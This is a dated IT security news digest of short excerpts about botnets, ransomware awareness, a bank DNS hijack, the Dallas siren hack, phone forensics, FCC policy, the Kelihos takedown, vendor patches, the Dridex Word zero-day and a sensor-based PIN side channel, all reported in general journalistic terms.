IT Security News Blast 4-12-2017

Few Americans understand cyber security, study finds

Seventy-five percent of those surveyed could pick the most secure password out of a list of four options, but 73 percent weren’t sure what a botnet was. “A botnet is essentially thousands or hundreds of thousands of zombie computers: computers that have been taken over by an attacker,” said Jeremy Johnson, Director of Offensive Security Services. […] The Pew study showed 73 percent of those surveyed understood that using public wifi, even if pass protected, is not always safe for sensitive activities, like banking. However, only 48 percent were sure what Ransomware was. Johnson says that’s when a hacker encrypts all your files with a password or key that you don’t know.

 Regular risk assessments can help mitigate cyber exposures

The regulations require cyber security standards for any entity licensed or similarly authorized by the department to operate in New York[.] […] The most key element of the regulation, Mr. Taft said, is the risk assessment that companies conduct. “Everything effectively keys off the risk assessment you do and how you handle the information gleaned from that assessment,” he said. “So obviously, it’s important that people do a risk assessment. Unless they do a risk assessment, they’re not going to be able to basically tailor their policies and procedures to the risks that have been identified.”

 When phone systems attack

Around the country, many agencies in metropolitan areas are moving or considering moving to consolidated, regionalized models for their public safety centers. […] Using the NENA i3 framework, NG911 offers a modern approach to network security and protection based IP-based architecture and capabilities. In fact, cybersecurity remains the greatest concern. With new multimedia, multimodal methods of communication that will receive not only voice traffic, but also text messages, pictures and video from public sources, network design and implementation must address segmentation, detection and isolation of potential threats in addition to resiliency and reliability.

 Bank gets lesson in the security failings of third parties

We’ve all been warned to make sure that the sites we visit are the intended ones — not altered by a strategically placed typo — and those warnings are especially important when it comes to banking sites. Attackers, of course, know that we’ve been trained to be wary. So the Brazilian thieves didn’t attack the bank — well, they did, but only after they had attacked the bank’s DNS provider. That allowed them to purchase valid digital certificates for the bank’s domain. Then they attacked the bank, planting malware that disabled antivirus apps.

 Cybersecurity jobs are there for the taking Are you?

“Only 7,533 jobs were added on average in this period compared to 11,533 jobs per month in the first nine months,” he wrote. While he pointed out that a three-month span is insufficient for a true analysis of labor numbers, still, the February results indicated “volatility and uncertainty in the marketplace for U.S. tech jobs.” Foote’s conclusion was that companies are cautious about hiring on full-time staff for technology-enabled solutions they are experimenting with. Rather, the call is going out to consultants and contingency workers to fill roles. This way, enterprises can remain flexible as they develop their security implementations.

 Similarities in partial fingerprints may trick biometric security systems

Using commercial fingerprint verification software, they found an average of 92 potential MasterPrints for every randomly sampled batch of 800 partial prints. […] They found, however, just one full-fingerprint MasterPrint in a sample of 800 full prints. “Not surprisingly, there’s a much greater chance of falsely matching a partial print than a full one, and most devices rely only on partials for identification,” said Memon.

 That Dallas Siren Hack Wasn’t Novel—It Was Just Really Loud

The Dallas incident fits with the broader uptick in infrastructure hacks around the country. From electric road signs to emergency text alert systems to suburban dams, hackers have targeted vulnerable structures with increasing boldness. And while the Dallas sirens did have some alarming secondary effects—over 4,000 calls to 911 flooded the city’s emergency response lines for several hours—it’s nothing next to the real danger that hacks like these could cause.

 How the Denver Police Crack and Search Cell Phones

Cellebrite’s UFED, as the device is more commonly known, is the leading model of mobile phone data extraction tools in law enforcement. Denver PD purchased a UFED Touch in January 2016 for about four grand. The Touch is used for cell phone data extractions done in the field and was infamously rumored to have been used by the FBI to crack the San Bernardino shooters’ encrypted iPhone after Apple denied their request for access. […] That Training Bulletin we got does a fine job of explaining just how potent these devices are and how they are used.

 What the Heck Are These Electronic Devices in Trump’s Situation Room?

Vietor also reminded me that Trump’s staff has a history of bad infosec. When North Korea launched a missile test in February, Trump and his aides—also then at Mar-A-Lago—used their cellphones as flashlights to review sensitive documents. If you’re drunk and trying to find your keys, this is fine. But when you’re a federal employee, hovering a camera-phone over classified information is a security disaster waiting to happen.

 “Unenforceable”: How voluntary net neutrality lets ISPs call the shots

Under ideal circumstances, this could prevent ISPs from committing egregious violations of net neutrality principles. But “voluntary” isn’t just a euphemism—ISPs would only be bound by net neutrality requirements as long as they promise to follow them. Even if all ISPs put the promise into their terms of service agreements, it’s not clear what would stop them from removing the promise later. If any new ISPs enter the market, it’s also unclear what would compel them to make the same promises. And those aren’t the only problems that would make net neutrality enforcement more difficult under Pai’s proposal.

 Rollback of FCC privacy requirements could have broad repercussions

“In an era of the U.S. government focusing on alleged wiretaps and cyber spying, we are now effectively handing this same data over to broadband providers to sell and share as they like,” he said. It’s not just marketers who might want to gain access to this data. “This information provides context around who we are, what we think, where we go and what we do,” said Jeff Kukowski, CEO at SecureAuth. “The potential misuses of this information in the hands of attackers is concerning and therefore needs to be critically protected like any other identity-related information.”

 The Human Point Of Cyber Security

Twee marketing buzzphrases aside, Moynahan’s point is well made: while security vulnerabilities in IT systems themselves certainly exist, they’re put there by the humans writing the code. The vulnerabilities are a problem largely because other humans seek to exploit them to nefarious ends. And your human employees are a vital link in being able to exploit these vulnerabilities. Clicking on a link in an email that starts the exploitation process (known as phishing in the colorful InfoSec jargon) requires a human being to take action.

 Budget woes hinder US cybersecurity buildup

Lawmakers are expected to pass a continuing resolution (CR) later this month to avoid a shutdown and fund the government past April 28, when the last spending deal expires. Analysts and officials say the use of a continuing resolution hinders the federal government’s cybersecurity efforts, delaying and damaging the work that is being done across various government agencies.

 All the World Wide Web’s a stage: Understanding the actor in the cyber threat landscape

IoCs tend to change very quickly, the actor behind does not, nor their objectives and tactics, techniques and procedures (TTPs). For example, US-CERT’s release of the Grizzly Steppe malicious Russian activity was complex in that many of the IoCs that were provided were false positives or TOR exit nodes, making it difficult for companies to make sense of them and ingest. As such, it’s vital that organisations look to understand the actor – their motive, opportunity and means – and not merely read into the IoCs if they are to protect themselves from potential attack.

 “Russia Could Launch Cyber Attacks That Would Affect Us All”

Speaking to Nick Ferrari on LBC, she said: “The thing you have to remember about about the way that Putin operates is that this is not just confined to Syria. “If action takes place in Syria, say for example another chemical weapons attack happened and America responds, it’s not necessarily going to be a linear response by Russia. “They could start making trouble in the Baltics. They could launch cyber attacks against against the US against the UK. And that creates a whole world of trouble which people are going to be factoring.

 China’s Answer to the US Military-Industrial Complex

The cyber and space domains could also benefit from civil-military integration. Integrating civilian expertise into the military sector would help China to develop cyber warfare capabilities and train next-generation cyber and space experts. Alternatively, joint development programs between the civilian and the military sectors will also help Chinese companies to compete in the emerging space and cyber industries.

 FBI Kills Kelihos Botnet after Russian Hacker Arrested in Spain

Earlier this week, Spanish authorities arrested a Russian hacker and “one of the world’s most notorious criminal spammers,” Peter Yuryevich Levashov (Severa) in Spain. Now, the Feds are working on dismantling Kelihos botnet used by Severa to conduct his large-scale cyber crimes. […] Although killing the world’s most sophisticated botnet is not a piece of cake, therefore, it may take some time for the authorities to announce the final word, but since the announcement was made yesterday we are positive that Kelihos by now is history.

 Adobe Patches 59 Vulnerabilities Across Flash, Reader, Photoshop

The company warned in a series of security bulletins posted shortly before noon Tuesday that the bulk of the bugs, 44, are critical and could lead to code execution. The 44 code execution bugs marks an uptick over last month, when Adobe only fixed six code execution bugs in Flash and even in February, when it patched 13 code execution bugs in the software.

 Critical Word 0-day is only 1 of 3 Microsoft bugs under attack

A zero-day code-execution vulnerability in Microsoft Office is one of three critical flaws under active attack in the wild, Microsoft warned Tuesday as it rolled out a batch of updates that plug the security holes. As Ars reported Monday night, attackers are exploiting the flaw to infect unsuspecting Word users with bank-fraud malware known as Dridex. Blog posts published Tuesday morning by security firms Netskope and FireEye reported that attackers are exploiting the same bug to install malware with the names Godzilla and Latenbot.

 Oh my Microsoft Word: Dridex hackers exploit unpatched flaw

Booby-trapped emails designed to spread the cyber-pathogen have been sent to hundreds of thousands of recipients across numerous organisations, according to email security firm Proofpoint. The switch to document exploits by the hackers represents a change of tactics by a group that previously leaned heavily on malicious macros to distribute their wares. The Word document exploit at the centre of the attack was only discovered last week, so its abuse represents a rapid weaponizisation of the exploit.

 Side-channel attack technique steals PINs by analyzing smart device sensor readings

As part of their study, researchers from Newcastle University created a JavaScript-based web program called PINlogger.js that uses machine learning to perform a side-channel attack that guesses Android users’ four-digit PIN numbers, based on how they maneuver and orient their devices while entering the codes. A test of PINlogger.js using a sample set of 50 PINs found that the script was able to correctly guess a user’s PIN 74 percent of the time on the first try, 94 percent of the time on the third attempt, and 100 percent of the time by the fifth try.